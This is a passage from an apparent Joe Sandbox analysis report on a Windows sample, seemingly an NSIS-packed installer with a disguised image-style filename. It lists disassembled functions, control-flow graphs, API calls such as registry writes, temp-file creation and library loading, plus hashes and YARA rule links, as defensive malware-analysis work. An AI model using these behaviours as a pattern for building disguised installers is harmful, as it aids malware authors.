                                        • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00000000), ref: 00406468
                                        • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000), ref: 004064C7
                                        • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000), ref: 004064D0
                                        • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000), ref: 004064F4
                                        • lstrlenA.KERNEL32(0042DFC0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00000000,00424440,74DF23A0), ref: 00406546
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: T@$Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-1635558900
                                        • Opcode ID: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                        • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                        • Opcode Fuzzy Hash: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                        • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                        Function 0040177E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 585 40177e-4017a1 call 402c5e call 405c8c 590 4017a3-4017a9 call 40628d 585->590 591 4017ab-4017bd call 40628d call 405c1f lstrcatA 585->591 596 4017c2-4017c8 call 406587 590->596 591->596 601 4017cd-4017d1 596->601 602 4017d3-4017dd call 406620 601->602 603 401804-401807 601->603 610 4017ef-401801 602->610 611 4017df-4017ed CompareFileTime 602->611 605 401809-40180a call 405dfb 603->605 606 40180f-40182b call 405e20 603->606 605->606 613 4018a3-4018cc call 4053d1 call 403168 606->613 614 40182d-401830 606->614 610->603 611->610 627 4018d4-4018e0 SetFileTime 613->627 628 4018ce-4018d2 613->628 616 401832-401874 call 40628d * 2 call 406320 call 40628d call 4059a3 614->616 617 401885-40188f call 4053d1 614->617 616->601 650 40187a-40187b 616->650 629 401898-40189e 617->629 632 4018e6-4018f1 CloseHandle 627->632 628->627 628->632 630 402af3 629->630 634 402af5-402af9 630->634 635 4018f7-4018fa 632->635 636 402aea-402aed 632->636 638 4018fc-40190d call 406320 lstrcatA 635->638 639 40190f-401912 call 406320 635->639 636->630 645 401917-4023af 638->645 639->645 648 4023b4-4023b9 645->648 649 4023af call 4059a3 645->649 648->634 649->648 650->629 651 40187d-40187e 650->651 651->617
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,00000000,00000000,00000031), ref: 004017BD
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,00000000,00000000,00000031), ref: 004017E7
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv507D.tmp$C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$Call
                                        • API String ID: 1941528284-524360879
                                        • Opcode ID: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                        • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                        • Opcode Fuzzy Hash: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                        • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                        Function 004053D1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 652 4053d1-4053e6 653 40549c-4054a0 652->653 654 4053ec-4053fe 652->654 655 405400-405404 call 406320 654->655 656 405409-405415 lstrlenA 654->656 655->656 658 405432-405436 656->658 659 405417-405427 lstrlenA 656->659 661 405445-405449 658->661 662 405438-40543f SetWindowTextA 658->662 659->653 660 405429-40542d lstrcatA 659->660 660->658 663 40544b-40548d SendMessageA * 3 661->663 664 40548f-405491 661->664 662->661 663->664 664->653 665 405493-405496 664->665 665->653
                                        APIs
                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                        • lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll
                                        • API String ID: 2531174081-1451998560
                                        • Opcode ID: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                        • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                        • Opcode Fuzzy Hash: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                        • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                        Function 00403168 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 666 403168-40317c 667 403185-40318e 666->667 668 40317e 666->668 669 403190 667->669 670 403197-40319c 667->670 668->667 669->670 671 4031ac-4031b9 call 40337a 670->671 672 40319e-4031a7 call 403390 670->672 676 403368 671->676 677 4031bf-4031c3 671->677 672->671 678 40336a-40336b 676->678 679 403313-403315 677->679 680 4031c9-403212 GetTickCount 677->680 683 403373-403377 678->683 681 403355-403358 679->681 682 403317-40331a 679->682 684 403370 680->684 685 403218-403220 680->685 689 40335a 681->689 690 40335d-403366 call 40337a 681->690 682->684 686 40331c 682->686 684->683 687 403222 685->687 688 403225-403233 call 40337a 685->688 692 40331f-403325 686->692 687->688 688->676 700 403239-403242 688->700 689->690 690->676 698 40336d 690->698 695 403327 692->695 696 403329-403337 call 40337a 692->696 695->696 696->676 703 403339-403345 call 405ec7 696->703 698->684 702 403248-403268 call 4067da 700->702 708 40330b-40330d 702->708 709 40326e-403281 GetTickCount 702->709 710 403347-403351 703->710 711 40330f-403311 703->711 708->678 712 403283-40328b 709->712 713 4032c6-4032c8 709->713 710->692 716 403353 710->716 711->678 717 403293-4032be MulDiv wsprintfA call 4053d1 712->717 718 40328d-403291 712->718 714 4032ca-4032ce 713->714 715 4032ff-403303 713->715 720 4032d0-4032d7 call 405ec7 714->720 721 4032e5-4032f0 714->721 715->685 722 403309 715->722 716->684 723 4032c3 717->723 718->713 718->717 726 4032dc-4032de 720->726 725 4032f3-4032f7 721->725 722->684 723->713 725->702 727 4032fd 725->727 726->711 728 4032e0-4032e3 726->728 727->684 728->725
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%$@DB
                                        • API String ID: 551687249-1316549817
                                        • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                        • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                        • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                        • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                        Function 00406647 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 729 406647-406667 GetSystemDirectoryA 730 406669 729->730 731 40666b-40666d 729->731 730->731 732 40667d-40667f 731->732 733 40666f-406677 731->733 734 406680-4066b2 wsprintfA LoadLibraryExA 732->734 733->732 735 406679-40667b 733->735 735->734
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                        • wsprintfA.USER32 ref: 00406697
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                        • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                        Function 6E33176B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 736 6e33176b-6e3317a7 call 6e331b28 740 6e3318c4-6e3318c6 736->740 741 6e3317ad-6e3317b1 736->741 742 6e3317b3-6e3317b9 call 6e33233f 741->742 743 6e3317ba-6e3317c7 call 6e332381 741->743 742->743 748 6e3317f7-6e3317fe 743->748 749 6e3317c9-6e3317ce 743->749 750 6e331800-6e33181c call 6e332568 call 6e3315e9 call 6e3312f6 GlobalFree 748->750 751 6e33181e-6e331822 748->751 752 6e3317d0-6e3317d1 749->752 753 6e3317e9-6e3317ec 749->753 775 6e331873-6e331877 750->775 758 6e331824-6e33186a call 6e3315fb call 6e332568 751->758 759 6e33186c-6e331872 call 6e332568 751->759 756 6e3317d3-6e3317d4 752->756 757 6e3317d9-6e3317da call 6e332ac8 752->757 753->748 754 6e3317ee-6e3317ef call 6e332d53 753->754 767 6e3317f4 754->767 763 6e3317e1-6e3317e7 call 6e332742 756->763 764 6e3317d6-6e3317d7 756->764 770 6e3317df 757->770 758->775 759->775 774 6e3317f6 763->774 764->748 764->757 767->774 770->767 774->748 779 6e3318b4-6e3318bb 775->779 780 6e331879-6e331887 call 6e33252e 775->780 779->740 782 6e3318bd-6e3318be GlobalFree 779->782 786 6e331889-6e33188c 780->786 787 6e33189f-6e3318a6 780->787 782->740 786->787 788 6e33188e-6e331896 786->788 787->779 789 6e3318a8-6e3318b3 call 6e331572 787->789 788->787 790 6e331898-6e331899 FreeLibrary 788->790 789->779 790->787
                                        APIs
                                          • Part of subcall function 6E331B28: GlobalFree.KERNEL32(?), ref: 6E331D99
                                          • Part of subcall function 6E331B28: GlobalFree.KERNEL32(?), ref: 6E331D9E
                                          • Part of subcall function 6E331B28: GlobalFree.KERNEL32(?), ref: 6E331DA3
                                        • GlobalFree.KERNEL32(00000000), ref: 6E331816
                                        • FreeLibrary.KERNEL32(?), ref: 6E331899
                                        • GlobalFree.KERNEL32(00000000), ref: 6E3318BE
                                          • Part of subcall function 6E33233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6E332370
                                          • Part of subcall function 6E332742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E3317E7,00000000), ref: 6E332812
                                          • Part of subcall function 6E3315FB: wsprintfA.USER32 ref: 6E331629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                        • String ID:
                                        • API String ID: 3962662361-3916222277
                                        • Opcode ID: 3e42cc902b781c67b6bc17be206e04dabb2fd17a76311f9f6ea2b3603f3ea253
                                        • Instruction ID: 6351ad8dc853541711ca2394ff7b01d28f9d350692347cf760268f22fd0dc41b
                                        • Opcode Fuzzy Hash: 3e42cc902b781c67b6bc17be206e04dabb2fd17a76311f9f6ea2b3603f3ea253
                                        • Instruction Fuzzy Hash: E241D0714002E69ADB409FF48994FEA77ECBF01314F3889B4E9959E086DF76814DC7A0
                                        Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 793 401c53-401c73 call 402c3c * 2 798 401c75-401c7c call 402c5e 793->798 799 401c7f-401c83 793->799 798->799 801 401c85-401c8c call 402c5e 799->801 802 401c8f-401c95 799->802 801->802 805 401ce3-401d09 call 402c5e * 2 FindWindowExA 802->805 806 401c97-401cb3 call 402c3c * 2 802->806 816 401d0f 805->816 817 401cd3-401ce1 SendMessageA 806->817 818 401cb5-401cd1 SendMessageTimeoutA 806->818 819 401d12-401d15 816->819 817->816 818->819 820 402aea-402af9 819->820 821 401d1b 819->821 821->820
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                        • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                        Function 004024A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 824 4024a3-4024d4 call 402c5e * 2 call 402cee 831 402aea-402af9 824->831 832 4024da-4024e4 824->832 833 4024f4-4024f7 832->833 834 4024e6-4024f3 call 402c5e lstrlenA 832->834 837 4024f9-40250d call 402c3c 833->837 838 40250e-402511 833->838 834->833 837->838 842 402522-402536 RegSetValueExA 838->842 843 402513-40251d call 403168 838->843 846 402538 842->846 847 40253b-402618 RegCloseKey 842->847 843->842 846->847 847->831
                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000023,00000011,00000002), ref: 004024EE
                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000000,00000011,00000002), ref: 0040252E
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000000,00000011,00000002), ref: 00402612
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv507D.tmp
                                        • API String ID: 2655323295-179125366
                                        • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                        • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                        • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                        • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18
                                        Function 00405E4F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 849 405e4f-405e59 850 405e5a-405e85 GetTickCount GetTempFileNameA 849->850 851 405e94-405e96 850->851 852 405e87-405e89 850->852 854 405e8e-405e91 851->854 852->850 853 405e8b 852->853 853->854
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E63
                                        • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-678247507
                                        • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                        • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                        Function 004020CA Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
